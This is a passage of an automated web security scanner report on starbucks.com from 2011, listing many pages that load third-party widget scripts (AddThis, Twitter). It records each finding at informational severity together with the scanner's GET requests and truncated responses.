<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.265. http://www.starbucks.com/menu/nutrition/20-under-200

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition/20-under-200

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/nutrition/20-under-200 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:03:13 GMT
Connection: close
Content-Length: 38219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.266. http://www.starbucks.com/menu/nutrition/35-under-350

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition/35-under-350

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/nutrition/35-under-350 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:03:35 GMT
Connection: close
Content-Length: 40754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.267. http://www.starbucks.com/responsibility

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /responsibility HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:24 GMT
Connection: close
Content-Length: 60638

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

           
           <script type="text/javascript" src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.268. http://www.starbucks.com/responsibility/community

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/community HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:28 GMT
Connection: close
Content-Length: 40282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.269. http://www.starbucks.com/responsibility/community/community-service

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/community-service

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/community/community-service HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:50 GMT
Connection: close
Content-Length: 37367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.270. http://www.starbucks.com/responsibility/community/ethos-water-fund

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/ethos-water-fund

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/community/ethos-water-fund HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:14 GMT
Connection: close
Content-Length: 36669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.271. http://www.starbucks.com/responsibility/community/starbucks-foundation

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/starbucks-foundation

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/community/starbucks-foundation HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:12 GMT
Connection: close
Content-Length: 39215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.272. http://www.starbucks.com/responsibility/community/starbucks-red

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/starbucks-red

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/community/starbucks-red HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:04 GMT
Connection: close
Content-Length: 41685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.273. http://www.starbucks.com/responsibility/community/youth-action

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/youth-action

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/community/youth-action HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:00 GMT
Connection: close
Content-Length: 39901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.274. http://www.starbucks.com/responsibility/diversity

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/diversity

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/diversity HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:51 GMT
Connection: close
Content-Length: 37965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.275. http://www.starbucks.com/responsibility/diversity/suppliers

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/diversity/suppliers

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/diversity/suppliers HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:16 GMT
Connection: close
Content-Length: 38852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.276. http://www.starbucks.com/responsibility/environment

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/environment HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:12:57 GMT
Connection: close
Content-Length: 50520

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.277. http://www.starbucks.com/responsibility/environment/climate-change

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment/climate-change

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/environment/climate-change HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:28 GMT
Connection: close
Content-Length: 40132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.278. http://www.starbucks.com/responsibility/environment/energy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment/energy

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/environment/energy HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:11 GMT
Connection: close
Content-Length: 38952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.279. http://www.starbucks.com/responsibility/environment/explore-green-store

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment/explore-green-store

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/environment/explore-green-store HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:51 GMT
Connection: close
Content-Length: 36506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.280. http://www.starbucks.com/responsibility/environment/green-building

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment/green-building

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/environment/green-building HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:23 GMT
Connection: close
Content-Length: 40583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.281. http://www.starbucks.com/responsibility/environment/recycling

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment/recycling

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/environment/recycling HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:05 GMT
Connection: close
Content-Length: 42967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.282. http://www.starbucks.com/responsibility/environment/water

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment/water

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/environment/water HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:20 GMT
Connection: close
Content-Length: 38993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.283. http://www.starbucks.com/responsibility/learn-more/goals-and-progress

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/learn-more/goals-and-progress

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/learn-more/goals-and-progress HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:33 GMT
Connection: close
Content-Length: 45256

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.284. http://www.starbucks.com/responsibility/learn-more/policies

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/learn-more/policies

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/learn-more/policies HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:15:08 GMT
Connection: close
Content-Length: 37906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.285. http://www.starbucks.com/responsibility/learn-more/relationships

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/learn-more/relationships

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/learn-more/relationships HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
